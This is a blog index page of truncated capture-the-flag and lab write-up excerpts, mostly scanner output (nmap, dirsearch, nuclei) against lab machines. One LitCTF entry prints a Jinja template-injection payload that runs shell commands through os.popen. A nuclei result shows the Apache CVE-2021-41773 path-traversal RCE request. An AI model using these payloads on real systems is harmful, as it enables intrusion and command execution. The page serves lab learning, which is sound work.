VulnVM-Manage

Box Info
OS: Linux
Difficulty: Easy

Nmap
[root@kali] /home/kali/manage ❯ nmap 192.168.55.66 -sV -A -p-
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
139/tcp open  netbios-ssn Samba smbd 4
445/tcp open  netbios-ssn Samba smbd 4
MAC Address: 08:00:27:01:D6:2B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

Dirsearch
[root@kali] /home/kali/manage ❯ dirsearch -u 'http://192.168.55.66'
dirsearch v0.4.3
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.55.66/
[23:33:52] Scanning:
[23:33:53] 403 - 278B - /.php
[23:33:55] 200 - 11KB - /admin.php
[23:34:01] 200 - 10KB - /index.html
[23:34:05] 403 - 278B - /server-status/
[23:34:05] 403 - 278B - /server-status
Task Completed

There does not seem to be any SQL injection, and the login cannot be brute-forced, so let's take a look at port 445 ...

May 31, 2025 · 3 min · 1278 words · HYH

VulNyx-Build

Box Info
OS: Windows
Difficulty: Low

Nmap
[root@kali] /home/kali ❯ nmap 192.168.55.68 -sV -A -p-
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
8080/tcp  open  http          Jetty 12.0.19
|_http-server-header: Jetty(12.0.19)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:9C:A2:BB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1709 - 21H2
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14h59m58s
| smb2-time:
|   date: 2025-06-01T03:03:58
|_  start_date: N/A
|_nbstat: NetBIOS name: BUILD, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:9c:a2:bb (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Jenkins RCE
Moving on to port 8080: the default credentials are simply admin/admin ...

May 31, 2025 · 2 min · 576 words · HYH

Dockerlabs-LogisticCloud

Nmap
[root@kali] /home/kali/LogisticCloud ❯ nmap 172.17.0.2 -sV -A -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 22:07 EDT
Nmap scan report for 172.17.0.2
Host is up (0.00011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e9:59:86:db:ea:af:ff:09:ee:8f:ab:c6:0d:b8:b5:82 (ECDSA)
|_  256 ff:8d:9f:f8:e7:a5:f4:ce:6a:2d:e4:30:ac:77:18:fc (ED25519)
80/tcp   open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Login - HLG Logistics
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
9000/tcp open  http    Golang net/http server
|_http-title: Site doesn't have a title (application/xml).
|_http-server-header: MinIO
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 303
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 18442BF4BCD11059
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 30 May 2025 02:08:05 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>18442BF4BCD11059</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   GenericLines, Help, RTSPRequest, SSLSessionReq:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 276
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 18442BF13C1B8666
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 30 May 2025 02:07:50 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>18442BF13C1B8666</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Vary: Origin
|     Date: Fri, 30 May 2025 02:07:50 GMT
|_    Content-Length: 0
9001/tcp open  http    Golang net/http server
|_http-server-header: MinIO Console
|_http-title: MinIO Console
| fingerprint-strings:
|   GenericLines, SSLSessionReq:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions:
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Content-Length: 1309
|     Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; script-src 'self' https://unpkg.com; connect-src 'self' https://unpkg.com;
|     Content-Type: text/html
|     Last-Modified: Fri, 30 May 2025 02:07:50 GMT
|     Referrer-Policy: strict-origin-when-cross-origin
|     Server: MinIO Console
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: DENY
|     X-Xss-Protection: 1; mode=block
|     Date: Fri, 30 May 2025 02:07:50 GMT
|_    <!doctype html><html lang="en"><head><meta charset="utf-8"/><base href="/"/><meta content="width=device-width,initial-scale=1" name="viewport"/><meta content="#081C42" media="(prefers-color-scheme: light)" name="theme-color"/><meta content="#081C42" media="(prefers-color-scheme: dark)" name="theme-color"/><meta content="MinIO Console" name="description"/><meta name="minio-license" content="agpl"/><link href="./s

AWS
Port 80 serves a login form; brute-forcing the login failed. Looking at the page source, I found a special value, huguelogistics-data, in a field whose name is bucket ...

May 30, 2025 · 3 min · 1182 words · HYH

Dockerlabs-Thedog

Nmap
[root@kali] /home/kali/thedog ❯ nmap 172.17.0.2 -sV -A -p-
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
|_http-title: Comando Ping
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

Nuclei
[root@kali] /home/kali/thedog ❯ nuclei -u http://172.17.0.2
nuclei v3.4.2 projectdiscovery.io
[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 7991
[INF] Executing 7793 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 198 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1743 (Reduced 1638 Requests)
[INF] Using Interactsh Server: oast.me
[CVE-2021-41773:RCE] [http] [high] http://172.17.0.2/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
[http-trace:trace-request] [http] [info] http://172.17.0.2
[http-trace:options-request] [http] [info] http://172.17.0.2
[missing-sri] [http] [info] http://172.17.0.2 ["https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"]
[waf-detect:apachegeneric] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:content-security-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://172.17.0.2
[http-missing-security-headers:referrer-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:strict-transport-security] [http] [info] http://172.17.0.2
[http-missing-security-headers:permissions-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-frame-options] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-content-type-options] [http] [info] http://172.17.0.2
[http-missing-security-headers:clear-site-data] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://172.17.0.2
[tech-detect:jsdelivr] [http] [info] http://172.17.0.2
[tech-detect:bootstrap] [http] [info] http://172.17.0.2
[apache-detect] [http] [info] http://172.17.0.2 ["Apache/2.4.49 (Unix)"]
[options-method] [http] [info] http://172.17.0.2 ["GET,POST,OPTIONS,HEAD,TRACE"]

CVE-2021-41773
After information gathering, the following way of executing commands was found ...

May 30, 2025 · 2 min · 640 words · HYH

HTB-Fluffy

Box Info
OS: Windows
Difficulty: Easy

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

Nmap
[root@kali] /home/kali/Fluffy ❯ nmap Fluffy.htb -sV -T4
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Add dc01.fluffy.htb to /etc/hosts ...

May 29, 2025 · 6 min · 2729 words · HYH

HTB-Puppy

Box Info
OS: Windows
Difficulty: Medium

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

Nmap
[root@kali] /home/kali/Puppy ❯ nmap puppy.htb -sV
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
111/tcp  open  rpcbind       2-4 (RPC #100000)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3260/tcp open  iscsi?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

RPC
[root@kali] /home/kali/Puppy ❯ rpcclient 10.xx.xx.xx -U levi.james
Password for [WORKGROUP\levi.james]:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[levi.james] rid:[0x44f]
user:[ant.edwards] rid:[0x450]
user:[adam.silver] rid:[0x451]
user:[jamie.williams] rid:[0x452]
user:[steph.cooper] rid:[0x453]
user:[steph.cooper_adm] rid:[0x457]
rpcclient $>

This gives us a list of users ...

May 28, 2025 · 6 min · 2727 words · HYH

LitCTF-2025

LITCTF2025

Web

星愿信箱
Testing shows this is SSTI; the blacklist can be bypassed by assigning intermediate values to variables:
{% set os = (lipsum | attr('__globals__')) | attr('get')('os') %}
{% set popen = os | attr('popen') %}
{% set input_cmd = "head /flag" %}
{% set cmd = popen(input_cmd).read() %}
{% print cmd %}

nest_js
Weak password; logging in gives the flag ...

May 26, 2025 · 3 min · 1475 words · HYH

HackMyVM-Homelab

Box Info
OS: Linux
Difficulty: Medium

Nmap
[root@kali] /home/kali/homelab ❯ nmap 192.168.55.41 -sV -A -p-
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.62 ((Unix))
|_http-favicon: Apache on Mac OS X
|_http-title: Mac OS X Server
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.62 (Unix)

Only port 80 is open.

Dir Fuzz
[root@kali] /home/kali/homelab ❯ dirsearch -u http://192.168.55.41
dirsearch v0.4.3
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.55.41/
[04:47:54] Scanning:
[04:48:00] 200 - 820B - /cgi-bin/printenv
[04:48:00] 200 - 1KB - /cgi-bin/test-cgi
[04:48:01] 200 - 4KB - /error.html
[04:48:01] 200 - 8KB - /favicon.ico
[04:48:02] 200 - 5KB - /index.html
[04:48:05] 301 - 313B - /script -> http://192.168.55.41/script/
[04:48:05] 403 - 276B - /script/
[04:48:06] 301 - 314B - /service -> http://192.168.55.41/service/
[04:48:06] 301 - 319B - /service?Wsdl -> http://192.168.55.41/service/?Wsdl
[04:48:06] 301 - 312B - /style -> http://192.168.55.41/style/
[04:48:10] 403 - 276B - /server-status/
[04:48:11] 403 - 276B - /server-status
Task Completed

[root@kali] /home/kali/homelab ❯ curl http://192.168.55.41/service/
Whoa! But sorry, this service is only available for myself!#

There is a /service path, but it seems to require authentication ...

May 17, 2025 · 8 min · 3694 words · HYH

Dockerlabs-Ciberguard

Machine Info
OS: Linux
Difficulty: Medium

Nmap
[root@kali] /home/kali/ciberguard ❯ nmap 172.17.0.2 -sV -A -p-
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 01:f6:3a:98:23:dc:8b:00:f0:5c:d5:50:07:f9:ec:e7 (ECDSA)
|_  256 b0:4e:cb:2a:e0:ac:cf:4c:14:7b:23:57:00:6d:12:1d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: CyberGuard - Seguridad Digital

Feroxbuster
[root@kali] /home/kali/ciberguard ❯ feroxbuster -u 'http://172.17.0.2/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
feroxbuster by Ben "epi" Risher, ver: 2.11.0
Target Url: http://172.17.0.2/
Threads: 50
Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Status Codes: All Status Codes!
Timeout (secs): 7
User-Agent: feroxbuster/2.11.0
Config File: /etc/feroxbuster/ferox-config.toml
Extract Links: true
Extensions: [php, txt]
HTTP methods: [GET]
Recursion Depth: 4
Press [ENTER] to use the Scan Management Menu
404 GET 9l 31w 272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 309c http://172.17.0.2/images => http://172.17.0.2/images/
200 GET 77l 154w 2111c http://172.17.0.2/archiv/script.js
200 GET 311l 560w 5015c http://172.17.0.2/archiv/styles.css
200 GET 231l 1204w 142716c http://172.17.0.2/images/Imagen(1).jpg
200 GET 59l 323w 28431c http://172.17.0.2/images/Image.jpg
200 GET 103l 363w 5100c http://172.17.0.2/
200 GET 279l 1484w 159900c http://172.17.0.2/images/Imagen%282%29.jpg
200 GET 12l 114w 7473c http://172.17.0.2/images/Iconn.png
200 GET 190l 1007w 91180c http://172.17.0.2/images/Imagen%285%29.png.jpg
200 GET 195l 1148w 120954c http://172.17.0.2/images/Imagen%283%29.jpg
200 GET 243l 1220w 121023c http://172.17.0.2/images/Imagen%284%29.jpg
200 GET 231l 1204w 142716c http://172.17.0.2/images/Imagen%281%29.jpg
301 GET 9l 28w 309c http://172.17.0.2/archiv => http://172.17.0.2/archiv/
403 GET 9l 28w 275c http://172.17.0.2/server-status
[####################] - 29s 661689/661689 0s found:14 errors:1341
[####################] - 28s 661638/661638 23558/s http://172.17.0.2/
[####################] - 0s 661638/661638 3576422/s http://172.17.0.2/images/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s 661638/661638 330819000/s http://172.17.0.2/archiv/ => Directory listing (add --scan-dir-listings to scan)

Own chloe
The directory listing shows a **/archiv/script.js** ...

May 13, 2025 · 4 min · 1528 words · HYH

HTB-Planning

Box Info
OS: Linux
Difficulty: Easy

As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r

Nmap
[root@kali] /home/kali/Planning ❯ nmap planning.htb -sV -A
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Edukate - Online Education Website

There is nothing exploitable on port 80, so let's try brute-forcing subdomains ...

May 12, 2025 · 2 min · 772 words · HYH